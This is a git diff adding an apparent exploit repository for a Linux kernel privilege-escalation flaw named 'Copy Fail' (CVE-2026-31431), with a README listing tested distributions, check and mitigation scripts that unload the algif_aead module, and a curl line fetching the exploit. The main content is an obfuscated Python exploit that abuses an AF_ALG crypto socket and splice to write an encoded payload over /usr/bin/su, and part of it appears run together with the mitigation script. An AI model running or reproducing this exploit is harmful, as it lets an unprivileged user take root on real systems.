diff --git a/README.md b/README.md index e69de29..fbaa12e 100644 --- a/README.md +++ b/README.md @@ -0,0 +1,25 @@ +# Copy Fail - CVE-2026-31431 + +[Technical Writeup](https://xint.io/blog/copy-fail-linux-distributions) + +## Tested Distro / Version + +| Distro | Version | +|-------------------|-------------------------| +| Ubuntu 24.04 LTS | 6.17.0-1007-aws | +| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 | +| RHEL 10.1 | 6.12.0-124.45.1.el10_1 | +| SUSE 16 | 6.12.0-160000.9-default | +| Rocky Linux 9.7 (Blue Onyx) | 5.14.0-611.49.1.el9_7.x86_64 | + + +## Files +check.sh - makes a check to see if the exploitable crypto module is loaded. +mitigate.sh - unloads the exploitable crypto module, chances are you didnt need it anyway. + +copy_fail_exp.py - the exploit in pure python. + + +run to get the file as a non-privilaged user. + + curl https://copy.fail/exp diff --git a/check.sh b/check.sh new file mode 100755 index 0000000..5ced9e6 --- /dev/null +++ b/check.sh @@ -0,0 +1,2 @@ +lsmod | grep algif_aead +cat /etc/modprobe.d/disable-algif.conf diff --git a/copy_fail_exp.py b/copy_fail_exp.py new file mode 100644 index 0000000..f69386d --- /dev/null +++ b/copy_fail_exp.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python3 +import os as g,zlib,socket as s +def d(x):return bytes.fromhex(x) +def c(f,t,c): + a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) + try:u.recv(8+t) + except:0 +f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) +while i /etc/modprobe.d/disable-algif.conf +rmmod algif_aead 2>/dev/null || true + +lsmod | grep algif_aead +cat /etc/modprobe.d/disable-algif.conf